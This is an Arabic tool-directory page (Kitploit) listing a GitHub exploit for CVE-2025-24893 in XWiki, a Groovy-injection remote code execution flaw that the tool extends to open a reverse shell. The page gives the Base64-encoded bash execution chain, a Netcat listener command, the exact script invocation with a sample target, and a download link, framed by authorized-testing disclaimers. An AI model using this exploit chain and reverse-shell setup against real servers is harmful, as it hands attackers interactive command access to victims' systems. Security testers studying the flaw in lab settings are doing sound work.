Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 استغلال RCE لـ XWiki مع إمكانية الصدفة العكسية | Kitploit
أدوات/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 استغلال RCE لـ XWiki مع إمكانية الصدفة العكسية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
36منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

استغلال شيل عكسي لـ CVE-2025-24893 في XWiki

إخلاء مسؤولية: هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستخدام الخاطئ قد يكون غير قانوني وخطير.

الوصف

يستغل هذا السكريبت بلغة بايثون CVE-2025-24893، وهي ثغرة تنفيذ أوامر عن بُعد تؤثر على إصدارات XWiki حتى 15.10.10.

  • الإصدار المُختبر: XWiki 15.10.8
  • التأثير: يسمح بتنفيذ أوامر عشوائية على الخادم المستهدف.
  • إصدار بايثون: كُتب واختُبر في بايثون 3

هذه النسخة توسع الإثبات الأولي (PoC) من قبل أل بارادي جوي لإطلاق شيل عكسي. يمكن العثور على الإثبات الأولي هنا.

كيف يعمل

  • يقوم XWiki بتنفيذ كود Groovy عبر معامل URL.

  • يقوم الاستغلال بحقن bash -c داخل قالب Groovy هذا.

  • تحتوي الشيل العكسي العادي على علامات اقتباس متعددة (' و ") قد تؤدي إلى كسر تقييم Groovy وعنوان URL.

  • لحل هذه المشكلة، يقوم السكريبت بتشفير أمر الشيل في سطر واحد باستخدام Base64.

  • ثم يتم إرسال الحمولة في عنوان URL وتنفيذها باستخدام السلسلة التالية:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • يقوم هذا بفك تشفير حمولة Base64 بأمان وتنفيذها مع bash -i، مما يعطي شيل عكسي تفاعلي.

  • تنسيق URL الهدف

    • التنسيق: http://<target-host>
    • لا تقم بتضمين:
      • شرطة مائلة / في النهاية
      • المسار /xwiki (السكريبت يضيفه تلقائيًا)

    أمثلة:

    root@kitploit:~
    # Correct
    http://10.129.95.114:8080
    http://example.com:8080
    
    # Incorrect
    http://10.129.95.114:8080/         # trailing slash
    http://example.com/xwiki            # includes /xwiki
    

    إعداد المستمع

    قبل تشغيل الاستغلال، يجب بدء مستمع على جهازك لاستقبال الشيل العكسي.

    مثال باستخدام Netcat:

    root@kitploit:~
    nc -lvnp <lport>
    
    • يجب أن يتطابق <lport> مع المنفذ الذي تقدمه كوسيطة للسكريبت.

    الاستخدام

    root@kitploit:~
    python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
    

    مثال:

    root@kitploit:~
    python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
    
    • يقوم السكريبت بطباعة عنوان URL الكامل للاستغلال وحمولة Base64 وتعليمات لفحص المستمع الخاص بك.

    المراجع

    • نشرة GHSA الأمنية
    • الصفحة الرئيسية لـ XWiki
    • الإثبات الأولي بواسطة أل بارادي جوي

    الإسناد

    • الإثبات الأولي: أل بارادي جوي
    • هذه النسخة: تم تطويرها لإطلاق شيل عكسي لتنفيذ أوامر تفاعلية

    تحذير

    • استخدم هذا الاستغلال فقط في بيئات خاضعة للتحكم (HTB، أجهزة مختبر، أجهزة افتراضية تملكها).
    • الاستخدام غير المصرح به على الخوادم العامة غير قانوني ويمكن أن يؤدي إلى تهم جنائية.
    تنزيل الأداة